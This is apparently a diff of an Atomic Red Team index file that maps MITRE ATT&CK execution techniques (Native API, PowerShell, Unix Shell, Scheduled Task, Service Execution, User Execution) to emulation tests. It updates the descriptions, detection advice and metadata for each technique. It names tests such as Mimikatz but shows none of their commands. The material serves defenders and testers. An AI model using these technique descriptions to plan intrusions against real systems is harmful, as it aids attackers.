+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -39555,11 +40841,12 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - root
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ - Process monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1053.004
atomic_tests:
- name: Event Monitor Daemon Persistence
@@ -39613,22 +40900,22 @@ execution:
phase_name: execution
modified: '2020-03-11T14:55:56.177Z'
created: '2020-03-11T14:49:36.954Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Anti-virus
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Anti-virus
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1204.002
atomic_tests:
- name: OSTap Style Macro Execution
@@ -39775,14 +41062,13 @@ execution:
name: powershell
T1204.001:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Malicious Link
+ created: '2020-03-11T14:43:31.706Z'
+ modified: '2020-03-11T14:43:31.706Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
them to click on a link that will lead to code execution. This user action
@@ -39791,13 +41077,14 @@ execution:
of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
Links may also lead users to download files that require execution via [Malicious
File](https://attack.mitre.org/techniques/T1204/002).
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-11T14:43:31.706Z'
- created: '2020-03-11T14:43:31.706Z'
+ name: Malicious Link
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1204.001
+ url: https://attack.mitre.org/techniques/T1204/001
x_mitre_platforms:
- Linux
- macOS
@@ -39820,81 +41107,97 @@ execution:
id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Native API
- description: "Adversaries may interact with the native Windows application programming
- interface (API) to execute behaviors. Similar to the system call interface
- on UNIX systems, the Windows native API provides a controlled means to calling
- low-level OS services within the kernel, such as those involving hardware/devices,
- memory, and processes. The native API is leveraged by the OS during system
- boot (when other system components are not yet initialized) but is also exposed
- to user-mode applications via ntdll.dll and ntoskrnl.exe.(Citation: Microsoft
- NativeAPI)\n\nFunctionality provided by the native API is also available via
- the Windows API, which provides a documented programming interface. For example,
- functions such as the Windows API CreateProcess will allow programs
- and scripts to start other processes with proper path and argument parameters.(Citation:
- Microsoft CreateProcess) This allows API callers to execute a binary, run
- a CLI command, load modules, etc. Thousands of similar API functions exist
- for various system operations.(Citation: Microsoft Win32)\n\nOther software
- frameworks, such as Microsoft .NET, are also available to interact with the
- native API. These frameworks typically provide wrappers/abstractions to API
- functionalities and are designed for ease-of-use/portability of code.(Citation:
- Microsoft NET)\n\nAdversaries may abuse the native API as a means of execution.
- Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
- the native API, and its hierarchy of interfaces, provide mechanisms to interact
- with and utilize a victimized system. "
+ description: |-
+ Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
+
+ Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
+
+ Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
+
+ Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.
external_references:
- source_name: mitre-attack
external_id: T1106
url: https://attack.mitre.org/techniques/T1106
- - source_name: Microsoft NativeAPI
- url: https://social.technet.microsoft.com/wiki/contents/articles/11831.the-windows-native-api.aspx
- description: Bruno, L. (2013, July 30). The Windows Native API. Retrieved
- March 15, 2020.
+ - source_name: NT API Windows
+ url: https://undocumented.ntinternals.net/
+ description: The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25,
+ 2020.
+ - source_name: Linux Kernel API
+ url: https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html
+ description: Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API.
+ Retrieved June 25, 2020.
- url: http://msdn.microsoft.com/en-us/library/ms682425
description: Microsoft. (n.d.). CreateProcess function. Retrieved December
5, 2014.
source_name: Microsoft CreateProcess
+ - source_name: GNU Fork
+ url: https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html
+ description: Free Software Foundation, Inc.. (2020, June 18). Creating a Process.
+ Retrieved June 25, 2020.
- source_name: Microsoft Win32
url: https://docs.microsoft.com/en-us/windows/win32/api/
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
+ - source_name: LIBC
+ url: https://man7.org/linux/man-pages//man7/libc.7.html
+ description: Kerrisk, M. (2016, December 12). libc(7) — Linux manual page.
+ Retrieved June 25, 2020.
+ - source_name: GLIBC
+ url: https://www.gnu.org/software/libc/
+ description: glibc developer community. (2020, February 1). The GNU C Library
+ (glibc). Retrieved June 25, 2020.
- source_name: Microsoft NET
url: https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework
description: Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15,
2020.
+ - source_name: Apple Core Services
+ url: https://developer.apple.com/documentation/coreservices
+ description: Apple. (n.d.). Core Services. Retrieved June 25, 2020.
+ - source_name: MACOS Cocoa
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1
+ description: Apple. (2015, September 16). Cocoa Application Layer. Retrieved
+ June 25, 2020.
+ - source_name: macOS Foundation
+ url: https://developer.apple.com/documentation/foundation
+ description: Apple. (n.d.). Foundation. Retrieved July 1, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-15T15:52:05.227Z'
+ modified: '2020-07-01T16:19:54.646Z'
created: '2017-05-31T21:31:17.472Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: "Monitoring API calls may generate a significant amount of
+ data and may not be useful for defense unless collected under specific circumstances,
+ since benign use of API functions are common and difficult to distinguish
+ from malicious behavior. Correlation of other events with behavior surrounding
+ API function calls using API monitoring will provide additional context to
+ an event that may assist in determining if it is due to malicious behavior.
+ Correlation of activity by process lineage by process ID may be sufficient.
+ \n\nUtilization of the Windows API may involve processes loading/accessing
+ system DLLs associated with providing called functions (ex: kernel32.dll,
+ advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially
+ to abnormal/unusual or potentially malicious processes, may indicate abuse
+ of the Windows API. Though noisy, this data can be combined with other indicators
+ to identify adversary activity. "
x_mitre_data_sources:
+ - System calls
- Loaded DLLs
- API monitoring
- Process monitoring
- x_mitre_detection: "Monitoring native and Windows API calls may generate a significant
- amount of data and may not be useful for defense unless collected under specific
- circumstances, since benign use of Windows API functions such as CreateProcess
- are common and difficult to distinguish from malicious behavior. Correlation
- of other events with behavior surrounding API function calls using API monitoring
- will provide additional context to an event that may assist in determining
- if it is due to malicious behavior. Correlation of activity by process lineage
- by process ID may be sufficient. \n\nUtilization of the Windows API may involve
- processes loading/accessing system DLLs associated with providing called functions
- (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for
- DLL loads, especially to abnormal/unusual or potentially malicious processes,
- may indicate abuse of the Windows API. Though noisy, this data can be combined
- with other indicators to identify adversary activity. "
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_version: '2.0'
+ x_mitre_is_subtechnique: false
identifier: T1106
atomic_tests:
- name: Execution through API - CreateProcess
@@ -39968,32 +41271,32 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T16:26:30.920Z'
+ modified: '2020-06-24T13:51:22.360Z'
created: '2020-03-09T13:48:55.078Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Praetorian
- x_mitre_data_sources:
- - Windows Registry
- - Process monitoring
- - Process command-line parameters
- - PowerShell logs
- - Loaded DLLs
- - File monitoring
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_remote_support: true
x_mitre_detection: |-
If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
- x_mitre_remote_support: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process monitoring
+ - Process command-line parameters
+ - PowerShell logs
+ - Loaded DLLs
+ - File monitoring
+ - DLL monitoring
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_platforms:
+ - Windows
identifier: T1059.001
atomic_tests:
- name: Mimikatz
@@ -40297,29 +41600,29 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T17:44:07.769Z'
+ modified: '2020-06-23T19:03:15.180Z'
created: '2020-03-09T14:38:24.334Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Python is installed.
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
+ x_mitre_detection: |-
+ Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+
+ Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
x_mitre_data_sources:
- System calls
- Process monitoring
- Process command-line parameters
- API monitoring
- x_mitre_detection: |-
- Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
-
- Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- x_mitre_system_requirements:
- - Python is installed.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
atomic_tests: []
T1053.005:
technique:
@@ -40368,13 +41671,11 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:03.730Z'
created: '2019-11-27T14:58:00.429Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -40390,11 +41691,13 @@ execution:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -40533,19 +41836,18 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:04.006Z'
created: '2017-05-31T21:30:46.977Z'
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_remote_support: true
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -40556,18 +41858,19 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_remote_support: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
atomic_tests: []
T1064:
technique:
@@ -40614,32 +41917,49 @@ execution:
phase_name: execution
modified: '2020-03-30T13:39:24.852Z'
created: '2017-05-31T21:30:51.733Z'
- x_mitre_deprecated: true
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- - Process command-line parameters
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Data Execution Prevention
- - Exploit Prevention
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
Analyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_defense_bypassed:
+ - Process whitelisting
+ - Data Execution Prevention
+ - Exploit Prevention
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_deprecated: true
atomic_tests: []
T1569.002:
technique:
+ created: '2020-03-10T18:33:36.159Z'
+ modified: '2020-03-28T18:52:02.384Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ id: attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4
+ description: |-
+ Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).
+
+ [PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)
+
+ Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.
+ name: Service Execution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1569.002
@@ -40652,23 +41972,6 @@ execution:
description: Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11.
Retrieved May 13, 2015.
source_name: Russinovich Sysinternals
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Execution
- description: |-
- Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).
-
- [PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)
-
- Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.
- id: attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-28T18:52:02.384Z'
- created: '2020-03-10T18:33:36.159Z'
x_mitre_platforms:
- Windows
x_mitre_data_sources:
@@ -40788,14 +42091,11 @@ execution:
phase_name: execution
modified: '2020-03-28T18:14:36.980Z'
created: '2017-05-31T21:31:40.542Z'
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Stefan Kanthak
- x_mitre_data_sources:
- - API monitoring
- - DLL monitoring
- - File monitoring
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring DLL module loads may generate a significant amount
of data and may not be directly useful for defense unless collected under
specific circumstances, since benign use of Windows modules load functions
@@ -40807,11 +42107,14 @@ execution:
of other events with behavior surrounding module loads using API monitoring
and suspicious DLLs written to disk will provide additional context to an
event that may assist in determining if it is due to malicious behavior."
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - API monitoring
+ - DLL monitoring
+ - File monitoring
+ - Process monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_version: '2.0'
atomic_tests: []
T1072:
technique:
@@ -40838,17 +42141,16 @@ execution:
phase_name: lateral-movement
modified: '2020-02-21T16:31:32.789Z'
created: '2017-05-31T21:30:57.201Z'
- x_mitre_contributors:
- - Shane Tully, @securitygypsy
- x_mitre_remote_support: true
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - File monitoring
+ - Third-party application logs
+ - Windows Registry
+ - Process monitoring
+ - Process use of network
+ - Binary file metadata
x_mitre_detection: "Detection methods will vary depending on the type of third-party
software or system and how it is typically used. \n\nThe same investigation
process can be applied here as with other potentially malicious activities
@@ -40867,16 +42169,17 @@ execution:
application deployment at regular times so that irregular deployment activity
stands out. Monitor process activity that does not correlate to known good
software. Monitor account login activity on the deployment system."
- x_mitre_data_sources:
- - Authentication logs
- - File monitoring
- - Third-party application logs
- - Windows Registry
- - Process monitoring
- - Process use of network
- - Binary file metadata
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_remote_support: true
+ x_mitre_contributors:
+ - Shane Tully, @securitygypsy
atomic_tests: []
T1153:
technique:
@@ -40904,23 +42207,23 @@ execution:
phase_name: execution
modified: '2020-03-30T13:40:14.512Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- - Process command-line parameters
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_detection: Monitor for command shell execution of source and subsequent
processes that are started as a result of being executed by a source command.
Adversaries must also drop a file to disk in order to execute it with source,
and these files can also detected by file monitoring.
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ - Process command-line parameters
+ x_mitre_version: '2.0'
atomic_tests: []
T1569:
technique:
@@ -40942,50 +42245,148 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T19:01:50.128Z'
+ modified: '2020-06-08T23:28:29.250Z'
created: '2020-03-10T18:23:06.482Z'
- x_mitre_platforms:
- - Windows
- - macOS
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_detection: Monitor for command line invocations of tools capable of
- modifying services that doesn’t correspond to normal usage patterns and known
- software, patch cycles, etc. Also monitor for changes to executables and other
- files associated with services. Changes to Windows services may also be reflected
- in the Registry.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_permissions_required:
- User
- Administrator
- SYSTEM
- root
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_detection: Monitor for command line invocations of tools capable of
+ modifying services that doesn’t correspond to normal usage patterns and known
+ software, patch cycles, etc. Also monitor for changes to executables and other
+ files associated with services. Changes to Windows services may also be reflected
+ in the Registry.
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
+ - macOS
atomic_tests: []
- T1204:
+ T1059.004:
technique:
- id: attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: User Execution
+ id: attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
description: |-
- An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
+ Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
- While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- external_references:
- - source_name: mitre-attack
- external_id: T1204
- url: https://attack.mitre.org/techniques/T1204
+ Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
+
+ Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
+ name: Unix Shell
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1059.004
+ url: https://attack.mitre.org/techniques/T1059/004
+ - source_name: DieNet Bash
+ url: https://linux.die.net/man/1/bash
+ description: die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12,
+ 2020.
+ - source_name: Apple ZShell
+ url: https://support.apple.com/HT208050
+ description: Apple. (2020, January 28). Use zsh as the default shell on your
+ Mac. Retrieved June 12, 2020.
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-11T14:55:56.315Z'
+ modified: '2020-06-15T16:55:44.483Z'
+ created: '2020-03-09T14:15:05.330Z'
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: "Unix shell usage may be common on administrator, developer,
+ or power user systems, depending on job function. If scripting is restricted
+ for normal users, then any attempt to enable scripts running on a system would
+ be considered suspicious. If scripts are not commonly used on a system, but
+ enabled, scripts running out of cycle from patching or other administrator
+ functions are suspicious. Scripts should be captured from the file system
+ when possible to determine their actions and intent.\n\nScripts are likely
+ to perform actions with various effects on a system that may generate events,
+ depending on the types of monitoring used. Monitor processes and command-line
+ arguments for script execution and subsequent behavior. Actions may be related
+ to network and system information discovery, collection, or other scriptable
+ post-compromise behaviors and could be used as indicators of detection leading
+ back to the source script. "
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ identifier: T1059.004
+ atomic_tests:
